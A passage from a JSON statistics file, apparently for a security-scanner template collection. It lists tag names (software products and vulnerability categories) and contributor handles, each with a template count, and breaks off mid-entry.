"pendo","count":1},{"name":"xproxy","count":1},{"name":"revslider","count":1},{"name":"huijietong","count":1},{"name":"cooperhewitt","count":1},{"name":"redhat","count":1},{"name":"primefaces","count":1},{"name":"instagram","count":1},{"name":"opensearch","count":1},{"name":"sls","count":1},{"name":"semaphore","count":1},{"name":"pirelli","count":1},{"name":"shoretel","count":1},{"name":"gcp","count":1},{"name":"jnoj","count":1},{"name":"bhagavadgita","count":1},{"name":"intellislot","count":1},{"name":"webalizer","count":1},{"name":"skywalking","count":1},{"name":"nweb2fax","count":1},{"name":"jinfornet","count":1},{"name":"sar2html","count":1},{"name":"opentsdb","count":1},{"name":"securityspy","count":1},{"name":"ioncube","count":1},{"name":"cors","count":1},{"name":"ganglia","count":1},{"name":"api-manager","count":1},{"name":"notebook","count":1},{"name":"msmtp","count":1},{"name":"sv3c","count":1},{"name":"nsasg","count":1},{"name":"wago","count":1},{"name":"h5sconsole","count":1},{"name":"dbt","count":1},{"name":"containers","count":1},{"name":"mapbox","count":1},{"name":"ncomputing","count":1},{"name":"cve2000","count":1},{"name":"google-earth","count":1},{"name":"bookstack","count":1},{"name":"dwr","count":1},{"name":"find","count":1},{"name":"pippoint","count":1},{"name":"tarantella","count":1},{"name":"mkdocs","count":1},{"name":"browserless","count":1},{"name":"jenzabar","count":1},{"name":"teltonika","count":1},{"name":"kenesto","count":1},{"name":"avalanche","count":1},{"name":"version","count":1},{"name":"dokuwiki","count":1},{"name":"tinypng","count":1},{"name":"kodexplorer","count":1},{"name":"txt","count":1},{"name":"phabricator","count":1},{"name":"locations","count":1},{"name":"pagerduty","count":1},{"name":"wavemaker","count":1},{"name":"feifeicms","count":1},{"name":"petfinder","count":1},{"name":"newrelic","count":1},{"name":"burp","count":1},{"name":"atvise","count":1},{"name":"webeditors","count":1},{"name":"aims","count":1},{"name":"slocum","count":1},{"name":"noptin","count":1},{"name":"workspace","count":1},{"name":"wallix","count":1},{"name":"pan","count":1},{"name":"gateone","count":1},{"name":"tplink","count":1},{"name":"loytec","count":1},{"name":"mojoauth","count":1},{"name":"coinapi","count":1},{"name":"checkmarx","count":1},{"name":"plc","count":1},{"name":"blockfrost","count":1},{"name":"dicoogle","count":1},{"name":"minimouse","count":1},{"name":"contentkeeper","count":1},{"name":"eyesofnetwork","count":1},{"name":"directadmin","count":1},{"name":"tracking","count":1},{"name":"defi","count":1},{"name":"youtube","count":1},{"name":"emerson","count":1},{"name":"kerbynet","count":1},{"name":"telecom","count":1},{"name":"fcm","count":1},{"name":"epm","count":1},{"name":"k8","count":1},{"name":"h3c-imc","count":1},{"name":"netweaver","count":1},{"name":"cve2021wordpress","count":1},{"name":"saltapi","count":1},{"name":"gridx","count":1},{"name":"markdown","count":1},{"name":"cve2004","count":1},{"name":"rsa","count":1},{"name":"jenkin","count":1},{"name":"sage","count":1},{"name":"clearbit","count":1},{"name":"abuseipdb","count":1},{"name":"ipvpn","count":1},{"name":"boa","count":1},{"name":"oliver","count":1},{"name":"kingdee","count":1},{"name":"abbott","count":1},{"name":"malwarebazaar","count":1},{"name":"shopizer","count":1},{"name":"unisharp","count":1},{"name":"ncbi","count":1},{"name":"myucms","count":1},{"name":"accuweather","count":1},{"name":"admin","count":1},{"name":"edgemax","count":1},{"name":"zzzphp","count":1},{"name":"franklinfueling","count":1},{"name":"fortilogger","count":1},{"name":"babel","count":1},{"name":"timeclock","count":1},{"name":"wondercms","count":1},{"name":"opm","count":1},{"name":"webctrl","count":1},{"name":"rwebserver","count":1},{"name":"email","count":1},{"name":"yishaadmin","count":1},{"name":"majordomo2","count":1},{"name":"office365","count":1},{"name":"apiman","count":1},{"name":"securepoint","count":1},{"name":"books","count":1},{"name":"thinkserver","count":1},{"name":"piano","count":1},{"name":"mongoshake","count":1},{"name":"shoppable","count":1},{"name":"etcd","count":1},{"name":"veeam","count":1},{"name":"kvm","count":1},{"name":"cryptocurrencies","count":1},{"name":"sgp","count":1},{"name":"cerebro","count":1},{"name":"eyoumail","count":1},{"name":"atmail","count":1},{"name":"osquery","count":1},{"name":"graylog","count":1},{"name":"aerohive","count":1},{"name":"privx","count":1},{"name":"jumpcloud","count":1},{"name":"pulsesecure","count":1},{"name":"smartsense","count":1},{"name":"vscode","count":1},{"name":"xmpp","count":1},{"name":"bigfix","count":1},{"name":"buildkite","count":1},{"name":"tectuus","count":1},{"name":"dahua","count":1},{"name":"cname","count":1},{"name":"solarlog","count":1},{"name":"kyan","count":1},{"name":"eyelock","count":1},{"name":"emlog","count":1},{"name":"novius","count":1},{"name":"asana","count":1},{"name":"secret","count":1},{"name":"calendarix","count":1},{"name":"appweb","count":1},{"name":"kyocera","count":1},{"name":"tamronos","count":1},{"name":"iucn","count":1},{"name":"flyteconsole","count":1},{"name":"etherpad","count":1},{"name":"stridercd","count":1},{"name":"rmc","count":1},{"name":"default","count":1},{"name":"triconsole","count":1},{"name":"alertmanager","count":1},{"name":"shortcode","count":1},{"name":"nuxeo","count":1},{"name":"route","count":1},{"name":"ssi","count":1},{"name":"spiderfoot","count":1},{"name":"mediumish","count":1},{"name":"short.io","count":1},{"name":"asus","count":1},{"name":"myvuehelp","count":1},{"name":"malshare","count":1},{"name":"zoomeye","count":1},{"name":"bitrise","count":1},{"name":"clickhouse","count":1},{"name":"pandorafms","count":1},{"name":"nifi","count":1},{"name":"spotify","count":1},{"name":"rhymix","count":1},{"name":"pinata","count":1},{"name":"blackboard","count":1},{"name":"labtech","count":1},{"name":"sitefinity","count":1},{"name":"mappress","count":1},{"name":"iserver","count":1},{"name":"glowroot","count":1},{"name":"bitquery","count":1},{"name":"covalent","count":1},{"name":"trello","count":1},{"name":"magicflow","count":1},{"name":"zeppelin","count":1},{"name":"ymhome","count":1},{"name":"floc","count":1},{"name":"powercreator","count":1},{"name":"bolt","count":1},{"name":"oauth2","count":1},{"name":"adminset","count":1},{"name":"flowci","count":1},{"name":"c99","count":1},{"name":"securitytrails","count":1},{"name":"dvr","count":1},{"name":"mozilla","count":1},{"name":"moinmoin","count":1},{"name":"hue","count":1},{"name":"jaspersoft","count":1},{"name":"secnet-ac","count":1},{"name":"wdja","count":1},{"name":"nimble","count":1},{"name":"haproxy","count":1},{"name":"esxi","count":1},{"name":"visualstudio","count":1},{"name":"mantis","count":1},{"name":"binaryedge","count":1},{"name":"axiom","count":1},{"name":"open-redirect","count":1},{"name":"varnish","count":1},{"name":"hetzner","count":1},{"name":"ddownload","count":1},{"name":"kindeditor","count":1},{"name":"tracer","count":1},{"name":"twitter-server","count":1},{"name":"perl","count":1},{"name":"sunflower","count":1},{"name":"billquick","count":1},{"name":"mpsec","count":1},{"name":"aspnuke","count":1},{"name":"struts2","count":1},{"name":"inspur","count":1},{"name":"foss","count":1},{"name":"formalms","count":1},{"name":"kubeflow","count":1},{"name":"netbiblio","count":1},{"name":"pyramid","count":1},{"name":"xunchi","count":1},{"name":"accent","count":1},{"name":"rsyncd","count":1},{"name":"st","count":1},{"name":"solarview","count":1},{"name":"ucp","count":1},{"name":"biqsdrive","count":1},{"name":"vnc","count":1},{"name":"mod-proxy","count":1},{"name":"opencart","count":1},{"name":"adiscon","count":1},{"name":"interactsh","count":1},{"name":"directions","count":1},{"name":"trane","count":1},{"name":"shindig","count":1},{"name":"caa","count":1},{"name":"sprintful","count":1},{"name":"leanix","count":1},{"name":"chinaunicom","count":1},{"name":"mailboxvalidator","count":1},{"name":"apos","count":1},{"name":"web-dispatcher","count":1},{"name":"biostar2","count":1},{"name":"sco","count":1},{"name":"tracing","count":1},{"name":"block","count":1},{"name":"speed","count":1},{"name":"catfishcms","count":1},{"name":"sponip","count":1},{"name":"optiLink","count":1},{"name":"parentlink","count":1},{"name":"whm","count":1},{"name":"wazuh","count":1},{"name":"vsftpd","count":1},{"name":"groupoffice","count":1},{"name":"ecom","count":1},{"name":"smartsheet","count":1},{"name":"geocode","count":1},{"name":"thecatapi","count":1},{"name":"memcached","count":1},{"name":"natemail","count":1},{"name":"maxsite","count":1},{"name":"plone","count":1},{"name":"portal","count":1},{"name":"xiuno","count":1},{"name":"snipeit","count":1},{"name":"pypicloud","count":1},{"name":"ssltls","count":1},{"name":"flickr","count":1},{"name":"formcraft3","count":1},{"name":"intelx","count":1},{"name":"tor","count":1},{"name":"pastebin","count":1},{"name":"argocd","count":1},{"name":"box","count":1},{"name":"issabel","count":1},{"name":"turbocrm","count":1},{"name":"delta","count":1},{"name":"saml","count":1},{"name":"selenium","count":1},{"name":"adoptapet","count":1},{"name":"debounce","count":1},{"name":"prototype","count":1},{"name":"yopass","count":1},{"name":"distance","count":1},{"name":"bonita","count":1},{"name":"nps","count":1},{"name":"fedora","count":1},{"name":"hivemanager","count":1},{"name":"xamr","count":1},{"name":"acme","count":1},{"name":"omi","count":1},{"name":"cliniccases","count":1},{"name":"razor","count":1},{"name":"nexusdb","count":1},{"name":"pmb","count":1},{"name":"dixell","count":1},{"name":"stytch","count":1},{"name":"rijksmuseum","count":1},{"name":"imap","count":1},{"name":"securenvoy","count":1},{"name":"cucm","count":1},{"name":"stackstorm","count":1},{"name":"panasonic","count":1},{"name":"novnc","count":1},{"name":"karel","count":1},{"name":"etouch","count":1},{"name":"apcu","count":1},{"name":"harvardart","count":1},{"name":"nimsoft","count":1},{"name":"scanii","count":1},{"name":"acsoft","count":1},{"name":"dericam","count":1},{"name":"threatq","count":1},{"name":"opengear","count":1},{"name":"servicedesk","count":1},{"name":"quantum","count":1},{"name":"oneblog","count":1},{"name":"extractor","count":1},{"name":"learnpress","count":1},{"name":"eg","count":1},{"name":"visualtools","count":1},{"name":"gilacms","count":1},{"name":"details","count":1},{"name":"incapptic-connect","count":1},{"name":"cve2001","count":1},{"name":"oam","count":1},{"name":"kodi","count":1},{"name":"wifisky","count":1},{"name":"ns","count":1},{"name":"coinranking","count":1},{"name":"openx","count":1},{"name":"buddy","count":1},{"name":"elevation","count":1},{"name":"beanstalk","count":1},{"name":"qualcomm","count":1},{"name":"webftp","count":1},{"name":"apple","count":1},{"name":"spidercontrol","count":1},{"name":"landrayoa","count":1},{"name":"cofense","count":1},{"name":"lanproxy","count":1},{"name":"racksnet","count":1},{"name":"synnefo","count":1},{"name":"restler","count":1},{"name":"viewlinc","count":1},{"name":"mirasys","count":1},{"name":"websvn","count":1},{"name":"deviantart","count":1},{"name":"projectdiscovery","count":1},{"name":"workreap","count":1},{"name":"geddy","count":1},{"name":"codemeter","count":1},{"name":"roads","count":1},{"name":"visionhub","count":1},{"name":"agegate","count":1},{"name":"eibiz","count":1},{"name":"jsp","count":1},{"name":"aniapi","count":1},{"name":"routeros","count":1},{"name":"expose","count":1},{"name":"tbk","count":1},{"name":"leostream","count":1},{"name":"alquist","count":1},{"name":"zm","count":1},{"name":"mara","count":1},{"name":"concrete5","count":1},{"name":"autocomplete","count":1},{"name":"contactform","count":1},{"name":"nerdgraph","count":1},{"name":"gateway","count":1},{"name":"redwood","count":1},{"name":"remkon","count":1},{"name":"suprema","count":1},{"name":"dapp","count":1},{"name":"fastly","count":1},{"name":"lg-nas","count":1},{"name":"improvmx","count":1},{"name":"tianqing","count":1},{"name":"achecker","count":1},{"name":"fatwire","count":1},{"name":"openweather","count":1},{"name":"krweb","count":1},{"name":"b2evolution","count":1},{"name":"newsletter","count":1},{"name":"opencast","count":1},{"name":"eyoucms","count":1},{"name":"prestahome","count":1},{"name":"dom","count":1},{"name":"faraday","count":1},{"name":"grails","count":1},{"name":"activeadmin","count":1},{"name":"pivotaltracker","count":1},{"name":"qizhi","count":1},{"name":"richfaces","count":1},{"name":"myanimelist","count":1},{"name":"purestorage","count":1},{"name":"revealjs","count":1},{"name":"sso","count":1},{"name":"sterling","count":1},{"name":"smartblog","count":1},{"name":"ldap","count":1},{"name":"maccmsv10","count":1},{"name":"webui","count":1},{"name":"dvdFab","count":1},{"name":"flexbe","count":1},{"name":"shopxo","count":1},{"name":"ewebs","count":1},{"name":"crestron","count":1},{"name":"ocs-inventory","count":1},{"name":"ruoyi","count":1},{"name":"ilo4","count":1},{"name":"doh","count":1},{"name":"console","count":1},{"name":"shopware","count":1},{"name":"mdm","count":1},{"name":"nc2","count":1},{"name":"gurock","count":1},{"name":"zend","count":1},{"name":"yzmcms","count":1},{"name":"redcap","count":1},{"name":"ulterius","count":1},{"name":"coinlayer","count":1},{"name":"emc","count":1},{"name":"idemia","count":1},{"name":"logontracer","count":1},{"name":"opnsense","count":1},{"name":"wmt","count":1},{"name":"zarafa","count":1},{"name":"secmail","count":1},{"name":"intelliflash","count":1},{"name":"drone","count":1},{"name":"tekon","count":1},{"name":"xdcms","count":1},{"name":"apigee","count":1},{"name":"defectdojo","count":1},{"name":"jeecg-boot","count":1},{"name":"clockwatch","count":1},{"name":"barco","count":1},{"name":"nordex","count":1},{"name":"cybrotech","count":1},{"name":"whmcs","count":1},{"name":"tika","count":1},{"name":"strider","count":1},{"name":"acexy","count":1},{"name":"viaware","count":1},{"name":"ricoh","count":1},{"name":"spectracom","count":1},{"name":"admidio","count":1},{"name":"taiga","count":1},{"name":"AlphaWeb","count":1},{"name":"particle","count":1},{"name":"csrfguard","count":1},{"name":"antsword","count":1},{"name":"finereport","count":1},{"name":"addpac","count":1},{"name":"clustering","count":1},{"name":"karma","count":1},{"name":"looker","count":1},{"name":"wiki","count":1},{"name":"zentral","count":1},{"name":"rujjie","count":1},{"name":"szhe","count":1},{"name":"mastodon","count":1},{"name":"sast","count":1},{"name":"portainer","count":1},{"name":"yarn","count":1},{"name":"alchemy","count":1},{"name":"tcexam","count":1},{"name":"fastcgi","count":1},{"name":"mrtg","count":1},{"name":"web-suite","count":1},{"name":"solman","count":1},{"name":"zenphoto","count":1},{"name":"cobub","count":1},{"name":"klog","count":1},{"name":"caddy","count":1},{"name":"guppy","count":1},{"name":"sucuri","count":1},{"name":"raspberrymatic","count":1},{"name":"qvisdvr","count":1},{"name":"uwsgi","count":1},{"name":"alerta","count":1},{"name":"allied","count":1},{"name":"cve2002","count":1},{"name":"eventtickets","count":1},{"name":"exponentcms","count":1},{"name":"cvnd2018","count":1},{"name":"upnp","count":1},{"name":"monitorr","count":1},{"name":"softaculous","count":1},{"name":"prismaweb","count":1},{"name":"timezone","count":1},{"name":"sefile","count":1},{"name":"fastapi","count":1},{"name":"ucs","count":1},{"name":"bash","count":1},{"name":"slstudio","count":1},{"name":"goip","count":1},{"name":"php-fusion","count":1},{"name":"couchcms","count":1},{"name":"casemanager","count":1},{"name":"wowza","count":1},{"name":"intellect","count":1},{"name":"phpwiki","count":1},{"name":"redmine","count":1},{"name":"sslmate","count":1},{"name":"bitcoinaverage","count":1},{"name":"tjws","count":1},{"name":"sonarcloud","count":1},{"name":"scalar","count":1},{"name":"loganalyzer","count":1},{"name":"planon","count":1},{"name":"comodo","count":1},{"name":"robomongo","count":1},{"name":"gerapy","count":1},{"name":"lacie","count":1},{"name":"openresty","count":1},{"name":"werkzeug","count":1},{"name":"fleet","count":1},{"name":"pagespeed","count":1},{"name":"iceflow","count":1},{"name":"sassy","count":1},{"name":"dropbox","count":1},{"name":"projector","count":1},{"name":"sauter","count":1},{"name":"beanshell","count":1},{"name":"timesheet","count":1},{"name":"charity","count":1},{"name":"onkyo","count":1},{"name":"secnet","count":1},{"name":"primetek","count":1},{"name":"vision","count":1},{"name":"tink","count":1},{"name":"droneci","count":1},{"name":"tugboat","count":1},{"name":"geutebruck","count":1},{"name":"xiaomi","count":1},{"name":"jabber","count":1},{"name":"loqate","count":1},{"name":"ecosys","count":1},{"name":"processmaker","count":1},{"name":"wix","count":1},{"name":"svnserve","count":1},{"name":"mautic","count":1},{"name":"okiko","count":1},{"name":"wordcloud","count":1},{"name":"piluscart","count":1},{"name":"comfortel","count":1},{"name":"scs","count":1},{"name":"netrc","count":1},{"name":"hiawatha","count":1},{"name":"clockwork","count":1},{"name":"bingmaps","count":1},{"name":"expressjs","count":1},{"name":"getgrav","count":1},{"name":"dbeaver","count":1},{"name":"hortonworks","count":1},{"name":"centreon","count":1},{"name":"bedita","count":1},{"name":"bravenewcoin","count":1},{"name":"daybyday","count":1},{"name":"mdb","count":1},{"name":"workresources","count":1},{"name":"polarisft","count":1},{"name":"domino","count":1},{"name":"nette","count":1},{"name":"gloo","count":1},{"name":"lancom","count":1},{"name":"coinmarketcap","count":1},{"name":"fullhunt","count":1},{"name":"micro","count":1},{"name":"travis","count":1},{"name":"strava","count":1},{"name":"totaljs","count":1}],"authors":[{"name":"daffainfo","count":565},{"name":"dhiyaneshdk","count":424},{"name":"pikpikcu","count":316},{"name":"pdteam","count":266},{"name":"geeknik","count":181},{"name":"dwisiswant0","count":168},{"name":"0x_akoko","count":139},{"name":"princechaddha","count":139},{"name":"gy741","count":122},{"name":"pussycat0x","count":116},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"ritikchaddha","count":53},{"name":"idealphase","count":50},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"adam crosser","count":30},{"name":"ice3man","count":26},{"name":"c-sh0","count":24},{"name":"organiccrap","count":24},{"name":"ffffffff0x","count":22},{"name":"akincibor","count":22},{"name":"for3stco1d","count":20},{"name":"righettod","count":19},{"name":"techbrunchfr","count":18},{"name":"cckuailong","count":17},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"r3dg33k","count":14},{"name":"milo2012","count":14},{"name":"sharath","count":13},{"name":"0ri2n","count":13},{"name":"sullo","count":12},{"name":"suman_kar","count":12},{"name":"melbadry9","count":12},{"name":"wdahlenb","count":11},{"name":"cyllective","count":11},{"name":"hackergautam","count":10},{"name":"nadino","count":10},{"name":"dogasantos","count":10},{"name":"meme-lord","count":10},{"name":"random_robbie","count":10},{"name":"alph4byt3","count":10},{"name":"johnk3r","count":10},{"name":"edoardottt","count":9},{"name":"emadshanab","count":9},{"name":"random-robbie","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"logicalhunter","count":8},{"name":"iamthefrogy","count":8},{"name":"techryptic (@tech)","count":7},{"name":"randomstr1ng","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"harshbothra_","count":7},{"name":"divya_mudgal","count":7},{"name":"forgedhallpass","count":7},{"name":"caspergn","count":7},{"name":"dr_set","count":7},{"name":"oppsec","count":7},{"name":"pentest_swissky","count":6},{"name":"leovalcante","count":6},{"name":"puzzlepeaches","count":6},{"name":"iamnoooob","count":6},{"name":"imnightmaree","count":6},{"name":"__fazal","count":6},{"name":"veshraj","count":6},{"name":"pathtaga","count":6},{"name":"evan rubinstein","count":6},{"name":"rootxharsh","count":6},{"name":"tess","count":5},{"name":"podalirius","count":5},{"name":"xelkomy","count":5},{"name":"ganofins","count":5},{"name":"joanbono","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"lu4nx","count":5},{"name":"elsfa7110","count":5},{"name":"_0xf4n9x_","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"nodauf","count":4},{"name":"dolev farhi","count":4},{"name":"defr0ggy","count":4},{"name":"wisnupramoedya","count":4},{"name":"tanq16","count":4},{"name":"h1ei1","count":4},{"name":"e_schultze_","count":4},{"name":"incogbyte","count":4},{"name":"dadevel","count":4},{"name":"whoever","count":3},{"name":"supras","count":3},{"name":"3th1c_yuk1","count":3},{"name":"johnjhacking","count":3},{"name":"alifathi-h1","count":3},{"name":"jarijaas","count":3},{"name":"dudez","count":3},{"name":"sushantkamble","count":3},{"name":"0w4ys","count":3},{"name":"arcc","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"r3naissance","count":3},{"name":"emenalf","count":3},{"name":"mavericknerd","count":3},{"name":"davidmckennirey","count":3},{"name":"skeltavik","count":3},{"name":"dr0pd34d","count":3},{"name":"lark-lab","count":3},{"name":"binaryfigments","count":3},{"name":"impramodsargar","count":3},{"name":"unstabl3","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"_generic_human_","count":3},{"name":"andydoering","count":3},{"name":"mr-xn","count":3},{"name":"fyoorer","count":3},{"name":"gitlab red team","count":3},{"name":"github.com/its0x08","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"me9187","count":3},{"name":"thomas_from_offensity","count":3},{"name":"f1tz","count":3},{"name":"joeldeleep","count":2},{"name":"kre80r","count":2},{"name":"ree4pwn","count":2},{"name":"martincodes-de","count":2},{"name":"randomrobbie","count":2},{"name":"sy3omda","count":2},{"name":"ajaysenr","count":2},{"name":"bp0lr","count":2},{"name":"amsda","count":2},{"name":"0xelkomy","count":2},{"name":"y4er","count":2},{"name":"moritz nentwig","count":2},{"name":"rafaelwdornelas","count":2},{"name":"nvn1729","count":2},{"name":"gevakun","count":2},{"name":"hetroublemakr","count":2},{"name":"bing0o","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"raesene","count":2},{"name":"prajiteshsingh","count":2},{"name":"huowuzhao","count":2},{"name":"thardt-praetorian","count":2},{"name":"parth","count":2},{"name":"nkxxkn","count":2},{"name":"taielab","count":2},{"name":"fabaff","count":2},{"name":"hahwul","count":2},{"name":"danielmofer","count":2},{"name":"0xprial","count":2},{"name":"hassan khan yusufzai - splint3r7","count":2},{"name":"x1m_martijn","count":2},{"name":"paradessia","count":2},{"name":"pxmme1337","count":2},{"name":"badboycxcc","count":2},{"name":"0xsapra","count":2},{"name":"ehsahil","count":2},{"name":"koti2","count":2},{"name":"smaranchand","count":2},{"name":"afaq","count":2},{"name":"paperpen","count":2},{"name":"bernardofsr","count":2},{"name":"0xsmiley","count":2},{"name":"n-thumann","count":2},{"name":"kiblyn11","count":2},{"name":"redteambrasil","count":2},{"name":"z0ne","count":2},{"name":"bananabr","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"k11h-de","count":2},{"name":"splint3r7","count":2},{"name":"0xrudra","count":2},{"name":"w4cky_","count":2},{"name":"ambassify","count":2},{"name":"swissky","count":2},{"name":"nuk3s3c","count":2},{"name":"manas_harsh","count":2},{"name":"dahse89","count":2},{"name":"gal nagli","count":2},{"name":"0xcrypto","count":2},{"name":"convisoappsec","count":2},{"name":"cocxanh","count":2},{"name":"bsysop","count":2},{"name":"vavkamil","count":2},{"name":"foulenzer","count":2},{"name":"socketz","count":2},{"name":"lotusdll","count":2},{"name":"luci","count":2},{"name":"dheerajmadhukar","count":2},{"name":"mohammedsaneem","count":2},{"name":"vsh00t","count":2},{"name":"cckuakilong","count":2},{"name":"g4l1t0","count":2},{"name":"r12w4n","count":2},{"name":"joshlarsen","count":2},{"name":"its0x08","count":2},{"name":"hackerarpan","count":2},{"name":"zomsop82","count":2},{"name":"sbani","count":2},{"name":"udit_thakkur","count":2},{"name":"geekby","count":2},{"name":"kaizensecurity","count":1},{"name":"sec_hawk","count":1},{"name":"sickwell","count":1},{"name":"schniggie","count":1},{"name":"elouhi","count":1},{"name":"b0rn2r00t","count":1},{"name":"pdp","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"streetofhackerr007","count":1},{"name":"exploitation","count":1},{"name":"alevsk","count":1},{"name":"alex","count":1},{"name":"0xteles","count":1},{"name":"j33n1k4","count":1},{"name":"pudsec","count":1},{"name":"udyz","count":1},{"name":"aresx","count":1},{"name":"akshansh","count":1},{"name":"makyotox","count":1},{"name":"geraldino2","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"clarkvoss","count":1},{"name":"luqman","count":1},{"name":"yashanand155","count":1},{"name":"2rs3c","count":1},{"name":"korteke","count":1},{"name":"nytr0gen","count":1},{"name":"borna nematzadeh","count":1},{"name":"d0rkerdevil","count":1},{"name":"daffianfo","count":1},{"name":"d4vy","count":1},{"name":"sicksec","count":1},{"name":"andirrahmani1","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"xstp","count":1},{"name":"mubassirpatel","count":1},{"name":"p-l-","count":1},{"name":"0xtavian","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"lethargynavigator","count":1},{"name":"mhdsamx","count":1},{"name":"andysvints","count":1},{"name":"oscarintherocks","count":1},{"name":"orpheus","count":1},{"name":"noobexploiter","count":1},{"name":"hanlaomo","count":1},{"name":"elder tao","count":1},{"name":"whynotke","count":1},{"name":"sshell","count":1},{"name":"chron0x","count":1},{"name":"bjhulst","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"fmunozs","count":1},{"name":"yavolo","count":1},{"name":"furkansenan","count":1},{"name":"berkdusunur","count":1},{"name":"miroslavsotak","count":1},{"name":"official_blackhat13","count":1},{"name":"tirtha_mandal","count":1},{"name":"omarkurt","count":1},{"name":"akash.c","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"majidmc2","count":1},{"name":"c3l3si4n","count":1},{"name":"luqmaan hadia","count":1},{"name":"_c0wb0y_","count":1},{"name":"revblock","count":1},{"name":"ringo","count":1},{"name":"coldfish","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"flag007","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"sherlocksecurity","count":1},{"name":"undefl0w","count":1},{"name":"jbaines-r7","count":1},{"name":"zinminphy0","count":1},{"name":"wabafet","count":1},{"name":"xeldax","count":1},{"name":"zsusac","count":1},{"name":"zandros0","count":1},{"name":"alperenkesk","count":1},{"name":"jteles","count":1},{"name":"0xceeb","count":1},{"name":"act1on3","count":1},{"name":"toufik-airane","count":1},{"name":"hakimkt","count":1},{"name":"manuelbua","count":1},{"name":"wlayzz","count":1},{"name":"intx0x80","count":1},{"name":"compr00t","count":1},{"name":"ohlinge","count":1},{"name":"tim_koopmans","count":1},{"name":"patralos","count":1},{"name":"rschio","count":1},{"name":"noamrathaus","count":1},{"name":"apt-mirror","count":1},{"name":"amnotacat","count":1},{"name":"hakluke","count":1},{"name":"notnotnotveg","count":1},{"name":"bughuntersurya","count":1},{"name":"ahmetpergamum","count":1},{"name":"s1r1u5_","count":1},{"name":"fq_hsu","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"shifacyclewla","count":1},{"name":"myztique","count":1},{"name":"anon-artist","count":1},{"name":"thebinitghimire","count":1},{"name":"ok_bye_now","count":1},{"name":"rubina119","count":1},{"name":"rojanrijal","count":1},{"name":"infosecsanyam","count":1},{"name":"b0yd","count":1},{"name":"droberson","count":1},{"name":"exceed","count":1},{"name":"mah3sec_","count":1},{"name":"skylark-lab","count":1},{"name":"x6263","count":1},{"name":"charanrayudu","count":1},{"name":"qlkwej","count":1},{"name":"phyr3wall","count":1},{"name":"arm!tage","count":1},{"name":"vzamanillo","count":1},{"name":"dhiyaneshdki","count":1},{"name":"clment cruchet","count":1},{"name":"yashgoti","count":1},{"name":"harshinsecurity","count":1},{"name":"cookiehanhoan","count":1},{"name":"juicypotato1","count":1},{"name":"husain","count":1},{"name":"gboddin","count":1},{"name":"rotemreiss","count":1},{"name":"ilovebinbash","count":1},{"name":"jrolf","count":1},{"name":"opencirt","count":1},{"name":"igibanez","count":1},{"name":"ahmed abou-ela","count":1},{"name":"tea","count":1},{"name":"breno_css","count":1},{"name":"0xceba","count":1},{"name":"jas37","count":1},{"name":"0ut0fb4nd","count":1},{"name":"exid","count":1},{"name":"evolutionsec","count":1},{"name":"_harleo","count":1},{"name":"ooooooo_q","count":1},{"name":"jeya seelan","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"nullfuzz","count":1},{"name":"co0nan","count":1},{"name":"justmumu","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"v0idc0de","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"kabirsuda","count":1},{"name":"izn0u","count":1},{"name":"mesaglio","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ipanda","count":1},{"name":"b4uh0lz","count":1},{"name":"th3.d1p4k","count":1},{"name":"pratik khalane","count":1},{"name":"bartu utku sarp","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"f1she3","count":1},{"name":"affix","count":1},{"name":"shreyapohekar","count":1},{"name":"elmahdi","count":1},{"name":"dievus","count":1},{"name":"ggranjus","count":1},{"name":"kurohost","count":1},{"name":"osamahamad","count":1},{"name":"ldionmarcil","count":1},{"name":"regala_","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"alexrydzak","count":1},{"name":"brenocss","count":1},{"name":"ofjaaah","count":1},{"name":"petruknisme","count":1},{"name":"arr0way","count":1},{"name":"nielsing","count":1},{"name":"jeya.seelan","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"knassar702","count":1},{"name":"ola456","count":1},{"name":"evan rubinstien","count":1},{"name":"philippdelteil","count":1},{"name":"xshuden","count":1},{"name":"lark lab","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"kareemse1im","count":1},{"name":"0xrod","count":1},{"name":"adrianmf","count":1},{"name":"brabbit10","count":1},{"name":"momen eldawakhly","count":1},{"name":"soyelmago","count":1},{"name":"_darrenmartyn","count":1},{"name":"absshax","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"iphantasmic","count":1},{"name":"ahmed 